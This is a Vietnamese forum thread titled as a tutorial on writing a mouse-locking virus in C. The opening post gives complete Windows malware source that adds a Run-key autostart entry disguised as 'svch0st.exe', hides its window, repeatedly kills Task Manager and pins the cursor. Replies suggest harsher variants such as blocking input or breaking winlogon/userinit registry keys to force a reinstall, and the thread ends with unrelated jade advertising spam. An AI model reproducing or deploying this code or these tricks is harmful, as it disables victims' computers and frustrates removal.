-
22-05-2009, 05:29 PM #1Junior Member
- Ngày tham gia
- Sep 2015
- Bài viết
- 0
Viết virus khóa chuột - Lập trình virus trên C
Yêu cầu ai copy paste thì ghi rõ nhé bài viết thuộc về congdongcviet nhé
Mã:#include <windows.h>#include <winbase.h>#include <tlhelp32.h>#include <ctype.h>#include <string.h> #define BUFSIZE 90 int test_key(void);int create_key(char *);int kill(void); BOOL KillProcess(LPSTR lpszExecutable){ BOOL bResult = FALSE; PROCESSENTRY32 pe32 = { sizeof(PROCESSENTRY32) }; HANDLE hProcess, hProcesses = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); if(Process32First(hProcesses, &pe32)){ do{ if(CompareString(LOCALE_USER_DEFAULT, NORM_IGNORECASE, pe32.szExeFile, -1, lpszExecutable, -1) == CSTR_EQUAL){ if((hProcess = OpenProcess(PROCESS_TERMINATE, FALSE, pe32.th32ProcessID)) != NULL){ TerminateProcess(hProcess, 0); CloseHandle(hProcess); bResult = TRUE; } } }while(Process32Next(hProcesses, &pe32)); CloseHandle(hProcesses); } return bResult;} int main(void){ int test,create; test=test_key(); if (test==2) { char *path="c:\\WINDOWS\\svch0st.exe"; create=create_key(path); } HWND inv; AllocConsole(); inv=FindWindowA("ConsoleWindowClass",NULL); ShowWindow(inv,0);int c;for(c=0;c<999999999999;c++){kill();SetCursorPos(1,900);Sleep(9);}} int test_key(void){ int check; HKEY hKey; char path[BUFSIZE]; DWORD buf_length=BUFSIZE; int reg_key; reg_key=RegOpenKeyEx(HKEY_LOCAL_MACHINE,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",0,KEY_QUERY_VALUE,&hKey); if(reg_key!=0) { check=1; return check; } reg_key=RegQueryValueEx(hKey,"Windows Files",NULL,NULL,(LPBYTE)path,&buf_length); if((reg_key!=0)||(buf_length>BUFSIZE)) check=2; if(reg_key==0) check=0; RegCloseKey(hKey); return check;} int create_key(char *path){ int reg_key,check; HKEY hkey; reg_key=RegCreateKey(HKEY_LOCAL_MACHINE,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",&hkey); if(reg_key==0) { RegSetValueEx((HKEY)hkey,"Windows files",0,REG_SZ,(BYTE *)path,strlen(path)); check=0; return check; } if(reg_key!=0) check=1; return check;} int kill(void){return KillProcess("taskmgr.exe");}
View more random threads:
- Ẩn Process trên Taskmanager trong lập trình VC++
- Project phân tích Malware
- Cách tạo file exe từ một ứng dụng
- Khẩn cấp diệt con bot trên máy các bạn !
- Phần mềm diệt virus dùng những phương pháp gì?
- Virus Autorun USB dù Windows đã Disable Autorun
- Tìm tài liệu về troijan
- cơ chế tự tổng hợp và phân rã của virus image.exe
- Mã nguồn virus viết bằng C(củ chuối)
- Code virut viết bằng C, tác dụng của nó như thế nào?
-
22-05-2009, 05:58 PM #2Junior Member
- Ngày tham gia
- Sep 2015
- Bài viết
- 0
@coder_gate : sao cậu không BlockInput lại cho nhanh, làm vậy chỉ cần kết hợp với disable taskmanager thì 80% là phải cài lại win [IMG]images/smilies/biggrin.png[/IMG]
-
23-05-2009, 08:40 AM #3Junior Member
- Ngày tham gia
- Sep 2015
- Bài viết
- 0
Hị hị.
Hồi trước cũng có tập tành viết virus.
Nhưng bi h có thêm mấy cái quản lý process rồi. kiểu này cũng dễ chống lắm.
Cái của bác coder_gate là kill lun task khi gọi thì dùng chương trình quản lý khác để kill con này. Còn nếu disable task như bác mèo nói thì vào regetry lấy lại [IMG]images/smilies/biggrin.png[/IMG] Cách mà mún cho ng khác cài lại win nhanh nhất là reg lại key winlogon hoặc key của userinit. thằng nào không bik dùng dos là chít lun [IMG]images/smilies/wink.png[/IMG])
-
23-05-2009, 12:04 PM #4Junior Member
- Ngày tham gia
- Sep 2015
- Bài viết
- 0
hay hy vọng mấy bác chỉ giáo thêm
em đang học c mà hok hiểu ứng dụng, công dụng có thể làm gì và làm ??????
nên nhiều khi cũng nản
may nhờ đọc bài này thấy thay đổi hẳn
-
23-05-2009, 06:07 PM #5Junior Member
- Ngày tham gia
- Sep 2015
- Bài viết
- 0
con này củ chuối ấy mà,lâu lâu thì up lên shared thôi chứ có mấy ý nghĩa đâu [IMG]images/smilies/smile.png[/IMG]
-
24-05-2009, 07:53 PM #6Junior Member
- Ngày tham gia
- Sep 2015
- Bài viết
- 0
Gửi bởi p.o.l
-
04-06-2009, 03:28 PM #7Banned
- Ngày tham gia
- Sep 2015
- Bài viết
- 0
Gửi bởi meoconlongvang
-
05-06-2009, 03:13 PM #8Junior Member
- Ngày tham gia
- Sep 2015
- Bài viết
- 0
Cho hỏi có mã nguồn trên rồi thì làm sao nữa???Hay là biên dịch trên máy mình luôn? Lỡ chính máy mình dính thì sao.
Em gà lắm, đừng chọc em
-
05-06-2009, 03:23 PM #9Junior Member
- Ngày tham gia
- Sep 2015
- Bài viết
- 0
dính thì xóa phát là xong chứ gì đâu,thêm nữa biên dịch trên VC++ nha
-
25-08-2009, 04:36 PM #10Banned
- Ngày tham gia
- Sep 2015
- Bài viết
- 0
Gửi bởi meoconlongvang
Ngọc Bích xanh bản chất thuộc dòng đá đá hoa (jade). Và cẩm thạch là tên gọi chung của ngọc bích. Vì thực chất chúng thuộc dòng đá đa khoáng được hình thành từ chất Silicat dưới dạng dioxy. Ngọc bích...
Chia sẻ Vòng tay ngọc bích xanh là...